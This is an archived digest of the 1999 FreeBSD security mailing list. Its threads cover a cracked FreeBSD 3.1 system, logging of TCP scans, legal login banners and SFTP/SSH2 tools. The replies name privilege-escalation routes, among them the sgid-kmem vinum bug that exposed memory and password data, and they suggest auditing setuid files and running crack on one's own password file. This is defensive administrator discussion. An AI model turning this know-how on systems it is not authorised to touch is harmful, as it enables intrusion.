1999 02:47:31 -0700 (PDT) Message-ID: <19990528024730.B15594@best.com> Date: Fri, 28 May 1999 02:47:30 -0700 From: "Jan B. Koum " To: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: <199905280927.OAA08009@nic.mmc.net.ge> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge>; from Dima on Fri, May 28, 1999 at 02:27:23PM +0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 28, 1999 at 02:27:23PM +0500, Dima wrote: > Hello, > I have 3.1 installed and friend of mine made a bet that he can hack into my system. He has ordinary account opened. So, he win! And i'am wondering if there are any security holes in 3.1? He login as himself via telnet, then he made him root (but he was not in wheel group and ofcourse did not know root password) and what is more interesting he cracked several password. He made all this in 2 houres, and password was minimal 10 symbols lenght, containg different case and digits. I am using MD5 codding, and as I knew it is impossible. Has someone any idea how it was done? Please, answer me, as my friend do not tell me anything about this as he feel like guru-hacker. > Thank you. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Hello, By default 3.0-RELEASE was shipped with /sbin/vinum set sgid kmem which allowed people to to read /dev/*mem -- which is where it is possible to grab your password file from. You can also do other nasties when you got sgid of kmem handy. See (as one big line): http://www.freebsd.org/cgi/getmsg.cgi?fetch=38413+41513+ /usr/local/www/db/text/1999/freebsd-security/19990124.freebsd-security This vinum bug was fixed on Jan 13th -- have you upgraded your system since? [Yes, I know you said you got 3.1, but I am just checking first] Of course, you might have had /root/.rhosts with "+ +" in it or some such. Or maybe you had older version of QPOP or imap server running? Those have remote overflows in them. Have you ever logged in from your friend machine into your machine and did 'su'? He might have got your keyboard keystrokes logged. Hard to tell how exactly your system got cracked. There are many ways. Most of them are not the OS fault too. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 2:51:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 3CC3D14F84 for ; Fri, 28 May 1999 02:51:32 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id CAA18491; Fri, 28 May 1999 02:50:07 -0700 (PDT) Message-ID: <19990528025007.C15594@best.com> Date: Fri, 28 May 1999 02:50:07 -0700 From: "Jan B. Koum " To: ark@eltex.ru Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990528023139.A15594@best.com> <199905280942.NAA13537@paranoid.eltex.spb.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905280942.NAA13537@paranoid.eltex.spb.ru>; from ark@eltex.ru on Fri, May 28, 1999 at 01:42:56PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > I remember a patch was posted here to log all TCP packets that are not part > of some known sequence. Really simple thing. Are you talking about http://www.best.com/~jkb/tcp_input.diff.txt one? I need to make it better .. I don't think it handles fast scan rate on 100base network well. -- Yan > > You should also note that net.inet.tcp.log_in_vain will ONLY log > > packets which have SYN bit set. That sucks if you get port scanned by > > something like nmap which can use FIN scan for example. (Or some other > > stealth scanning technique). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 3: 4:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 95E1B14C41 for ; Fri, 28 May 1999 03:04:33 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id OAA22133; Fri, 28 May 1999 14:04:29 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 28 May 1999 14:03:48 +0400 Received: from undisclosed-intranet-sender id xma027049; Fri, 28 May 99 14:03:48 +0400 Date: Fri, 28 May 1999 14:03:38 +0400 Message-Id: <199905281003.OAA13633@paranoid.eltex.spb.ru> In-Reply-To: <19990528025007.C15594@best.com> from ""Jan B. Koum " " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: TCP connect data logger To: jkb@best.com Cc: ark@eltex.ru, dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Yep, something like this one. It does not handle heavy load, though, nor original log_in_vain does. Actually syslogd does not. So i don't see any good workarounds, maybe some rate analysers could help.. "Jan B. Koum " said : > On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > > > nuqneH, > > > > I remember a patch was posted here to log all TCP packets that are not part > > of some known sequence. Really simple thing. > > Are you talking about http://www.best.com/~jkb/tcp_input.diff.txt > one? I need to make it better .. I don't think it handles fast scan rate on > 100base network well. > > -- Yan > > > > You should also note that net.inet.tcp.log_in_vain will ONLY log > > > packets which have SYN bit set. That sucks if you get port scanned by > > > something like nmap which can use FIN scan for example. (Or some other > > > stealth scanning technique). _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN05p+aH/mIJW9LeBAQEo4AP/XKAny3R0pWXomOcV6f2yphQqFLGc5sUk ps4lx4eWwZknhfjqUkBJEDguXKcOtGjq6nMcm999KGsHHQgughp4z+tc44IYEJex a5xWqw6rqL2hiZRJyqFWkcFvsWWtagrdoZ2ekx/5c1iTlMuF17hUI/JsybNGER7W 3ZvD95LRZuE= =PwDa -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 3:13:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id F180C14C8B for ; Fri, 28 May 1999 03:13:19 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id DAA20325; Fri, 28 May 1999 03:12:18 -0700 (PDT) Message-ID: <19990528031217.D15594@best.com> Date: Fri, 28 May 1999 03:12:17 -0700 From: "Jan B. Koum " To: Jamie Rishaw , Chriss Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc References: <19990528001436.C28844@rage.arpa.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990528001436.C28844@rage.arpa.com>; from Jamie Rishaw on Fri, May 28, 1999 at 12:14:36AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 28, 1999 at 12:14:36AM -0500, Jamie Rishaw wrote: > Note, that doesnt work for ssh. > > I use /etc/COPYRIGHT for all my must-read's. > > The only problem is, that's post-login. > > You can define copyright file in /etc/login.conf ":copyright=" directive. > > -jamie Uhm... 'must-read'? ;) Heh. Guess what? If a user has .hushlogin in his $HOME, he/she is not going to see your /etc/COPYRIGHT message at all: % touch $HOME/.hushlogin % cat /etc/COPYRIGHT lkadjflkasjfasdl % login login: jkb Password: % See /usr/src/usr.bin/login/login.c around line 548 The best way to make sure your users see a message is to place a hack into login.c which just ignores the existence of .hushlogin file. BTW, since sshd does not use /usr/bin/login (unless you force it to do so, and it then needs a patch to do it right and not to core on BSD). So with sshd you just edit /etc/sshd_config (or /usr/local/etc) and set "PrintMotd yes" in the sshd config file. Then of course you need to make sshd ignores $HOME/.hushlogin also... ;-) Argh! Hell. There is not good way to get your message across. If l^Huser choose not to read it, they will not read it no matter what. :( -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 3:25:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id ADC9B14C8B for ; Fri, 28 May 1999 03:25:28 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id DAA21262; Fri, 28 May 1999 03:24:30 -0700 (PDT) Message-ID: <19990528032430.E15594@best.com> Date: Fri, 28 May 1999 03:24:30 -0700 From: "Jan B. Koum " To: ark@eltex.ru Cc: dada@sbox.tu-graz.ac.at, security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990528025007.C15594@best.com> <199905281003.OAA13633@paranoid.eltex.spb.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199905281003.OAA13633@paranoid.eltex.spb.ru>; from ark@eltex.ru on Fri, May 28, 1999 at 02:03:38PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was a brief talk on security-officer@ of using something similar to a simple queue which just keeps a counter of how many packets you see. I am not sure if anything came out of this. I can see a problem where you have to ignore ports for logging -- else your events don't match. For example, if I see a scan from: xxx:random -> yyy:random I have to ignore 'random' ports. (Else all event to log look very different and will only have counter of one). Back to ground zero. Hmm... -- Yan On Fri, May 28, 1999 at 02:03:38PM +0400, ark@eltex.ru wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > nuqneH, > > Yep, something like this one. It does not handle heavy load, though, > nor original log_in_vain does. Actually syslogd does not. So i don't see > any good workarounds, maybe some rate analysers could help.. > > "Jan B. Koum " said : > > > On Fri, May 28, 1999 at 01:42:56PM +0400, ark@eltex.ru wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > > > nuqneH, > > > > > > I remember a patch was posted here to log all TCP packets that are not part > > > of some known sequence. Really simple thing. > > > > Are you talking about http://www.best.com/~jkb/tcp_input.diff.txt > > one? I need to make it better .. I don't think it handles fast scan rate on > > 100base network well. > > > > -- Yan > > > > > > You should also note that net.inet.tcp.log_in_vain will ONLY log > > > > packets which have SYN bit set. That sucks if you get port scanned by > > > > something like nmap which can use FIN scan for example. (Or some other > > > > stealth scanning technique). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 3:49: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 91B4A14C87 for ; Fri, 28 May 1999 03:48:53 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.00 #1) id 10nKBb-0000Aq-00; Fri, 28 May 1999 12:48:23 +0200 From: Sheldon Hearn To: "Jan B. Koum " Cc: Nicholas Brawn , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc In-reply-to: Your message of "Fri, 28 May 1999 03:12:17 MST." <19990528031217.D15594@best.com> Date: Fri, 28 May 1999 12:48:23 +0200 Message-ID: <671.927888503@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 May 1999 03:12:17 MST, "Jan B. Koum " wrote: > Argh! Hell. There is not good way to get your message across. If > l^Huser choose not to read it, they will not read it no matter what. :( Nicholas isn't looking for a way to force text upon people who have logged into the system. He wants to force text upon people who are presented with a login prompt. The short and sweet of it is that there is no unified mechanism for this. You'll have to identify all entry points and either tickle or kludge, depending on the flexibility of each. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 4:57:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id E8F5C14C81 for ; Fri, 28 May 1999 04:57:55 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id VAA00090; Fri, 28 May 1999 21:57:37 +1000 Date: Fri, 28 May 1999 21:57:36 +1000 (EST) From: Nicholas Brawn To: Dima Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The first thing I recommend you do is identify all setuid and setgid files on the system: # find / -perm -4000 > /tmp/suid.log # find / -perm -2000 > /tmp/sgid.log After doing that review them for any odd files. I'm guessing he exploited a priviledged program. Alternatively, review what services are running, and check you're running the latest versions of all of them. Nick On Fri, 28 May 1999, Dima wrote: > Hello, > I have 3.1 installed and friend of mine made a bet that he can hack into my system. He has ordinary account opened. So, he win! And i'am wondering if there are any security holes in 3.1? He login as himself via telnet, then he made him root (but he was not in wheel group and ofcourse did not know root password) and what is more interesting he cracked several password. He made all this in 2 houres, and password was minimal 10 symbols lenght, containg different case and digits. I am using MD5 codding, and as I knew it is impossible. Has someone any idea how it was done? Please, answer me, as my friend do not tell me anything about this as he feel like guru-hacker. > Thank you. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 5:13:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 005EF14CCB for ; Fri, 28 May 1999 05:13:27 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id WAA00890; Fri, 28 May 1999 22:13:11 +1000 Date: Fri, 28 May 1999 22:13:09 +1000 (EST) From: Nicholas Brawn To: Sheldon Hearn Cc: "Jan B. Koum " , freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc In-Reply-To: <671.927888503@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For the systems I'm looking at, the main entry points into the system will be: - Telnet - FTP - SSH - SFTP/SCP Telnet and Ftp banners look relatively simple to implement. But it looks a bit tricky with ssh without displaying until the user has logged in. Alternatively you could get them to sign a legal document prior to granting them access to IT resources which discusses what authority they have over what, which is already a recommendation. If it cannot be displayed until a user logs in (/etc/motd), nobody's going to die. And if you say they may be able to quell such notices via .hushlogin, we can add something to /etc/profile to display notices, or even specify a program as their shell which does nothing more than displaying the notice before dropping them into a shell. At this stage I'm keen to find out what simply solutions there are available. If I need to tinker, so be it. :) Thanks to everyone for the input, Nick On Fri, 28 May 1999, Sheldon Hearn wrote: > > > On Fri, 28 May 1999 03:12:17 MST, "Jan B. Koum " wrote: > > > Argh! Hell. There is not good way to get your message across. If > > l^Huser choose not to read it, they will not read it no matter what. :( > > Nicholas isn't looking for a way to force text upon people who have > logged into the system. He wants to force text upon people who are > presented with a login prompt. > > The short and sweet of it is that there is no unified mechanism for > this. You'll have to identify all entry points and either tickle or > kludge, depending on the flexibility of each. > > Ciao, > Sheldon. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 5:41:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id CECAE152AA for ; Fri, 28 May 1999 05:41:39 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA26847; Fri, 28 May 1999 09:41:43 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199905281241.JAA26847@ns1.sminter.com.ar> Subject: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: from Nicholas Brawn at "May 28, 99 10:13:09 pm" To: ncb@zip.com.au (Nicholas Brawn) Date: Fri, 28 May 1999 09:41:43 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Nicholas Brawn escribió: > - SFTP/SCP SFTP? Is just FTP+SSH port forwarding or really encrypted auth and data? Are there Win clients available? Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 5:43:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 17E8C15A5C for ; Fri, 28 May 1999 05:43:22 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id WAA03097; Fri, 28 May 1999 22:43:17 +1000 Date: Fri, 28 May 1999 22:43:15 +1000 (EST) From: Nicholas Brawn To: Fernando Schapachnik Cc: freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: <199905281241.JAA26847@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Never having personally used it (big scp fan), i believe it's part of SSH2. Check the documents on www.ssh.fi. If there are windows clients available, they will probably be linked from there. Nick=20 On Fri, 28 May 1999, Fernando Schapachnik wrote: > En un mensaje anterior, Nicholas Brawn escribi=F3: > > - SFTP/SCP >=20 > SFTP? Is just FTP+SSH port forwarding or really encrypted auth and data? = Are=20 > there Win clients available? >=20 >=20 > Fernando P. Schapachnik > Administraci=F3n de la red > VIA Net Works Argentina SA >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 15:57: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.andrew.cmu.edu (SMTP2.ANDREW.CMU.EDU [128.2.10.82]) by hub.freebsd.org (Postfix) with ESMTP id B49A014DC5 for ; Fri, 28 May 1999 15:57:01 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix6.andrew.cmu.edu (UNIX6.ANDREW.CMU.EDU [128.2.15.10]) by smtp2.andrew.cmu.edu (8.8.5/8.8.2) with ESMTP id SAA05940; Fri, 28 May 1999 18:54:36 -0400 (EDT) Date: Fri, 28 May 1999 18:54:37 -0400 (EDT) From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix6.andrew.cmu.edu To: Nicholas Brawn Cc: Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am personally curious as to whether or not someone has developed a free SSH2 daemon yet. I would like to see a nice free implementation of it developed (maybe with a nice sftp curses client ala ncftp) and am pondering working on it or not in my spare time. I like scp but sometimes prefer a ftp client interface when transfering files. Just a thought. It would also be nice to have free Win32 development going on that, but I guess you can't have everything. Any pointers from people would be nice. On Fri, 28 May 1999, Nicholas Brawn wrote: > Never having personally used it (big scp fan), i believe it's part of > SSH2. Check the documents on www.ssh.fi. If there are windows clients > available, they will probably be linked from there. > > Nick > > On Fri, 28 May 1999, Fernando Schapachnik wrote: > > > En un mensaje anterior, Nicholas Brawn escribió: > > > - SFTP/SCP > > > > SFTP? Is just FTP+SSH port forwarding or really encrypted auth and data? Are > > there Win clients available? > > > > > > Fernando P. Schapachnik > > Administración de la red > > VIA Net Works Argentina SA > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 16: 0:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.inficad.com (mail.inficad.com [207.19.74.5]) by hub.freebsd.org (Postfix) with ESMTP id DE82214DC5 for ; Fri, 28 May 1999 16:00:34 -0700 (PDT) (envelope-from joeym@inficad.com) Received: from exchsrvr.inficad.com (exchsrvr.inficad.com [208.204.81.4]) by mail.inficad.com (8.9.3/8.9.0) with ESMTP id QAA83393; Fri, 28 May 1999 16:00:24 -0700 (MST) Received: by exchsrvr.inficad.com with Internet Mail Service (5.5.1960.3) id ; Fri, 28 May 1999 16:00:57 -0700 Message-ID: <813A3F0E2D02D211884900A0C966731EA7AD79@exchsrvr.inficad.com> From: joeym@inficad.com To: Harry_M_Leitzell@cmu.edu Cc: freebsd-security@FreeBSD.ORG Subject: RE: SFTP (was Re: legal notice for telnet/etc) Date: Fri, 28 May 1999 16:00:56 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.1960.3) Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org look for 'lsh' on http://freshmeat.net .. just saw it a day or two ago, and i believe it claimed to be a free implementation of ssh2. -- Joey Miller Lead Programmer Inficad Communications 602.265.4423 / 888.265.4423 -----Original Message----- From: Harry M. Leitzell [mailto:Harry_M_Leitzell@cmu.edu] Sent: Friday, May 28, 1999 3:55 PM To: Nicholas Brawn Cc: Fernando Schapachnik; freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) I am personally curious as to whether or not someone has developed a free SSH2 daemon yet. I would like to see a nice free implementation of it developed (maybe with a nice sftp curses client ala ncftp) and am pondering working on it or not in my spare time. I like scp but sometimes prefer a ftp client interface when transfering files. Just a thought. It would also be nice to have free Win32 development going on that, but I guess you can't have everything. Any pointers from people would be nice. On Fri, 28 May 1999, Nicholas Brawn wrote: > Never having personally used it (big scp fan), i believe it's part of > SSH2. Check the documents on www.ssh.fi. If there are windows clients > available, they will probably be linked from there. >=20 > Nick=20 >=20 > On Fri, 28 May 1999, Fernando Schapachnik wrote: >=20 > > En un mensaje anterior, Nicholas Brawn escribi=F3: > > > - SFTP/SCP > >=20 > > SFTP? Is just FTP+SSH port forwarding or really encrypted auth and data? Are=20 > > there Win clients available? > >=20 > >=20 > > Fernando P. Schapachnik > > Administraci=F3n de la red > > VIA Net Works Argentina SA > >=20 >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 [-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D= -=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D= -=3D--=3D-=3D--=3D-=3D--=3D-=3D--=3D-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 16:18:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id C51F2156FB for ; Fri, 28 May 1999 16:18:42 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA02314; Fri, 28 May 1999 16:18:07 -0700 (PDT) Message-ID: <19990528161807.A1393@best.com> Date: Fri, 28 May 1999 16:18:07 -0700 From: "Jan B. Koum " To: Nicholas Brawn , Sheldon Hearn Cc: freebsd-security@FreeBSD.ORG Subject: Re: legal notice for telnet/etc References: <671.927888503@axl.noc.iafrica.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Nicholas Brawn on Fri, May 28, 1999 at 10:13:09PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 28, 1999 at 10:13:09PM +1000, Nicholas Brawn wrote: > For the systems I'm looking at, the main entry points into the system will > be: > - Telnet > - FTP > - SSH > - SFTP/SCP > > Telnet and Ftp banners look relatively simple to implement. But it looks a > bit tricky with ssh without displaying until the user has logged in. > Alternatively you could get them to sign a legal document prior to > granting them access to IT resources which discusses what authority they > have over what, which is already a recommendation. If it cannot be > displayed until a user logs in (/etc/motd), nobody's going to die. And if > you say they may be able to quell such notices via .hushlogin, we can add > something to /etc/profile to display notices, or even specify a program as > their shell which does nothing more than displaying the notice before > dropping them into a shell. > > At this stage I'm keen to find out what simply solutions there are > available. If I need to tinker, so be it. :) > > Thanks to everyone for the input, > Nick If you need to tinker, then for ssh you can do something similar to the following: user goes to https://ssh.yourcompany.com The page asks username:password and present user with an agreement of usage. If he will agree by clicking on "I Agree", you give him a new ssh RSA key (ssh-keygen) and while he takes a second to download it, you place the key in his $HOME/.ssh They weak part in the picture is username:passwd -- replace is with something like Cryptocard (www.cryptocard.com -- which happen to support FreeBSD btw) and you all set. They actually have apache module to auth against their radiusd server ... Tinker away Nick. ;) -- yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 16:51:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id 93AD914CA0 for ; Fri, 28 May 1999 16:51:09 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id UAA08269; Fri, 28 May 1999 20:51:07 -0300 (ADT) Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id UAA05764; Fri, 28 May 1999 20:51:05 -0300 (ADT) Date: Fri, 28 May 1999 20:51:05 -0300 (ADT) From: Michael Richards <026809r@dragon.acadiau.ca> X-Sender: 026809r@dragon To: Dima Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <199905280927.OAA08009@nic.mmc.net.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 28 May 1999, Dima wrote: > can hack into my system. He has ordinary account opened. So, he win! And > i'am wondering if there are any security holes in 3.1? He login as > himself via telnet, then he made him root (but he was not in wheel group > and ofcourse did not know root password) and what is more interesting he Finding an exploitable suid program would allow this to happen. > cracked several password. He made all this in 2 houres, and password was > minimal 10 symbols lenght, containg different case and digits. I am > using MD5 codding, and as I knew it is impossible. Has someone any idea I would do 2 things: a) take your master.passwd file and run crack on it yourself and see if it finds the passwords itself. I played with crack once a long time ago and based on what you've said about the cracked password, I belive it is more likely that he a) broke root b) sniffed the passwords or maybe he shoulder surfed the passwords... I don't believe that md5 can be cracked that quickly. I guess it depends on the randomness of the password. "thisissEcur3" might take a week, but crack will still get it. I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all the other commonly substituted letters. -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 18:16: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id A103214DD5 for ; Fri, 28 May 1999 18:16:01 -0700 (PDT) (envelope-from john@vapornet.net) Received: from datapit.home.vapornet.net (vapornet.xnet.com [205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) 